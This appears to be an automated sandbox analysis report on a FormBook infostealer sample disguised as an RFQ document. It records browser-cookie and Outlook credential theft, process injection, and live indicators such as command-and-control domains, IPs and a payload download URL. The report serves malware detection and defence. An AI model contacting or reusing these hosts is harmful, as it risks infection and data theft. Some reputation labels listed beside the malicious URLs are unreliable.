              Source: Yara matchFile source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: WIN_81
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: WIN_XP
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: WIN_XPe
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: WIN_VISTA
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: WIN_7
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: WIN_8
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00EE6596
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00EE6A5A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		2
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		14
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts              		1
              Abuse Elevation Control Mechanism              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
              Valid Accounts              		4
              Obfuscated Files or Information              		NTDS127
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
              Access Token Manipulation              		12
              Software Packing              		LSA Secrets151
              Security Software Discovery              		SSH3
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
              Process Injection              		1
              Timestomp              		Cached Domain Credentials41
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Masquerading              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Valid Accounts              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
              Virtualization/Sandbox Evasion              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Access Token Manipulation              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task512
              Process Injection              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467353 Sample: RFQ - MK FMHS.RFQ.24.101.exe Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 54 ytw6.top 2->54 56 www.ytw6.top 2->56 58 22 other IPs or domains 2->58 74 Snort IDS alert for network traffic 2->74 76 Multi AV Scanner detection for domain / URL 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 12 other signatures 2->80 14 RFQ - MK FMHS.RFQ.24.101.exe 4 2->14         started        signatures3 process4 signatures5 112 Binary is likely a compiled AutoIt script file 14->112 114 Writes to foreign memory regions 14->114 116 Maps a DLL or memory area into another process 14->116 17 svchost.exe 14->17         started        process6 signatures7 72 Maps a DLL or memory area into another process 17->72 20 bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe 17->20 injected process8 process9 22 RMActivate_ssp.exe 17 20->22         started        dnsIp10 60 185.234.72.101, 49754, 80 COMBAHTONcombahtonGmbHDE United Kingdom 22->60 50 C:\Users\user\AppData\Local\...\xl9lsbb.exe, PE32 22->50 dropped 52 C:\Users\user\...\VT3g2PdlLRVpwBp[1].exe, PE32 22->52 dropped 88 Tries to steal Mail credentials (via file / registry access) 22->88 90 Modifies the context of a thread in another process (thread injection) 22->90 92 Maps a DLL or memory area into another process 22->92 94 2 other signatures 22->94 27 xl9lsbb.exe 3 22->27         started        30 bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe 22->30 injected 33 firefox.exe 22->33         started        file11 signatures12 process13 dnsIp14 104 Machine Learning detection for dropped file 27->104 106 Injects a PE file into a foreign processes 27->106 35 xl9lsbb.exe 27->35         started        66 www.lexiecos.top 203.161.55.102, 49750, 49751, 49752 VNPT-AS-VNVNPTCorpVN Malaysia 30->66 68 7a4ca695fd164z.greycdn.net 165.154.0.120, 49736, 80 INTERHOPCA Canada 30->68 70 5 other IPs or domains 30->70 108 Found direct / indirect Syscall (likely to bypass EDR) 30->108 signatures15 process16 signatures17 82 Maps a DLL or memory area into another process 35->82 38 bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe 35->38 injected process18 signatures19 84 Maps a DLL or memory area into another process 38->84 86 Found direct / indirect Syscall (likely to bypass EDR) 38->86 41 runonce.exe 13 38->41         started        process20 signatures21 96 Tries to steal Mail credentials (via file / registry access) 41->96 98 Tries to harvest and steal browser information (history, passwords, etc) 41->98 100 Modifies the context of a thread in another process (thread injection) 41->100 102 2 other signatures 41->102 44 bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe 41->44 injected 48 firefox.exe 41->48         started        process22 dnsIp23 62 ndhockeyprospects.com 162.241.253.174, 49771, 80 UNIFIEDLAYER-AS-1US United States 44->62 64 www.qmancha.com 202.95.21.152, 49774, 49776, 49778 BCPL-SGBGPNETGlobalASNSG Singapore 44->64 110 Found direct / indirect Syscall (likely to bypass EDR) 44->110 signatures24

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ - MK FMHS.RFQ.24.101.exe37%ReversingLabsWin32.Trojan.Strab
              RFQ - MK FMHS.RFQ.24.101.exe37%VirustotalBrowse
              RFQ - MK FMHS.RFQ.24.101.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VT3g2PdlLRVpwBp[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\xl9lsbb.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              ytw6.top1%VirustotalBrowse
              www.binpvae.lol1%VirustotalBrowse
              www.hsck520.com5%VirustotalBrowse
              www.lexiecos.top1%VirustotalBrowse
              www.augaqfp.lol1%VirustotalBrowse
              www.qmancha.com9%VirustotalBrowse
              www.778981.com3%VirustotalBrowse
              www.byteffederal.com4%VirustotalBrowse
              www.mhtnvro.lol1%VirustotalBrowse
              ndhockeyprospects.com2%VirustotalBrowse
              www.ytw6.top1%VirustotalBrowse
              www.webuyfontana.com0%VirustotalBrowse
              www.caroinapottery.com1%VirustotalBrowse
              www.jjkelker.com1%VirustotalBrowse
              www.cloud-force.club2%VirustotalBrowse
              www.mebutnotme.store0%VirustotalBrowse
              www.a9jcpf.top0%VirustotalBrowse
              www.ndhockeyprospects.com4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.fontbureau.com/designersG0%URL Reputationsafe
              http://www.fontbureau.com/designers/?0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.fontbureau.com/designers?0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://www.fontbureau.com/designers0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.fonts.com0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
              http://www.fontbureau.com0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.fontbureau.com/designers80%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              http://www.a9jcpf.top/1kbe/0%Avira URL Cloudsafe
              https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
              https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
              https://track.uc.cn/collect0%Avira URL Cloudsafe
              http://www.ytw6.top/rmef/0%Avira URL Cloudsafe
              https://v-cn.vaptcha.com/v3.js0%Avira URL Cloudsafe
              https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
              http://www.qmancha.com/3in6/?b4=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&5DGDh=Hn3dOR0%Avira URL Cloudsafe
              https://track.uc.cn/collect0%VirustotalBrowse
              https://hm.baidu.com/hm.js?0%VirustotalBrowse
              http://www.ytw6.top/rmef/1%VirustotalBrowse
              https://v-cn.vaptcha.com/v3.js0%VirustotalBrowse
              http://www.hsck520.com0%Avira URL Cloudsafe
              https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
              http://www.a9jcpf.top/1kbe/0%VirustotalBrowse
              https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%VirustotalBrowse
              https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%VirustotalBrowse
              https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
              http://www.augaqfp.lol/l8a4/0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
              https://cdn.livechatinc.com/tracking.js0%Avira URL Cloudsafe
              https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
              http://ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu0%Avira URL Cloudsafe
              http://www.hsck520.com5%VirustotalBrowse
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%VirustotalBrowse
              https://cdn.livechatinc.com/tracking.js0%VirustotalBrowse
              http://www.lexiecos.top/ff8d/0%Avira URL Cloudsafe
              http://www.webuyfontana.com/cns4/0%Avira URL Cloudsafe
              http://www.qmancha.com/3in6/0%Avira URL Cloudsafe
              http://www.lexiecos.top/ff8d/1%VirustotalBrowse
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%VirustotalBrowse
              http://185.234.72.101/VT3g2PdlLRVpwBp.exe0%Avira URL Cloudsafe
              http://www.binpvae.lol/kfqo/100%Avira URL Cloudmalware
              http://www.hsck520.com/2e2r/0%Avira URL Cloudsafe
              http://www.qmancha.com0%Avira URL Cloudsafe
              http://www.webuyfontana.com/cns4/0%VirustotalBrowse
              http://www.mhtnvro.lol/il19/0%Avira URL Cloudsafe
              https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
              http://www.ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=0%Avira URL Cloudsafe
              https://www.livechat.com/chat-with/14282961/0%Avira URL Cloudsafe
              http://www.augaqfp.lol/l8a4/1%VirustotalBrowse
              https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%VirustotalBrowse
              https://www.livechat.com/?welcome0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ytw6.top
              		38.47.232.224
              		truetrueunknown
              aj.ajunsdfancsda.com
              		207.148.37.252
              		truetrue
                		unknown
                www.hsck520.com
                		35.190.52.58
                		truefalseunknown
                www.binpvae.lol
                		116.213.43.190
                		truetrueunknown
                www.lexiecos.top
                		203.161.55.102
                		truetrueunknown
                ndhockeyprospects.com
                		162.241.253.174
                		truetrueunknown
                www.augaqfp.lol
                		116.213.43.190
                		truetrueunknown
                www.mhtnvro.lol
                		116.213.43.190
                		truetrueunknown
                7a4ca695fd164z.greycdn.net
                		165.154.0.120
                		truetrue
                  		unknown
                  www.webuyfontana.com
                  		13.248.169.48
                  		truetrueunknown
                  www.qmancha.com
                  		202.95.21.152
                  		truetrueunknown
                  www.778981.com
                  		unknown
                  		unknowntrueunknown
                  www.byteffederal.com
                  		unknown
                  		unknowntrueunknown
                  www.jjkelker.com
                  		unknown
                  		unknowntrueunknown
                  www.ytw6.top
                  		unknown
                  		unknowntrueunknown
                  www.caroinapottery.com
                  		unknown
                  		unknowntrueunknown
                  www.a9jcpf.top
                  		unknown
                  		unknowntrueunknown
                  www.ndhockeyprospects.com
                  		unknown
                  		unknowntrueunknown
                  www.cloud-force.club
                  		unknown
                  		unknowntrueunknown
                  www.mebutnotme.store
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.a9jcpf.top/1kbe/true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ytw6.top/rmef/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.qmancha.com/3in6/?b4=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&5DGDh=Hn3dORtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.augaqfp.lol/l8a4/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.lexiecos.top/ff8d/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.webuyfontana.com/cns4/true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.qmancha.com/3in6/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.binpvae.lol/kfqo/true
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.234.72.101/VT3g2PdlLRVpwBp.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.hsck520.com/2e2r/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.mhtnvro.lol/il19/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabRMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designersGxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsRMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designers/?xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsRMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.founder.com.cn/cn/bThexl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers?xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://track.uc.cn/collectRMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.goodfont.co.krxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://v-cn.vaptcha.com/v3.jsRMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sajatypeworks.comxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.typography.netDxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn/cThexl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.galapagosdesign.com/staff/dennis.htmxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
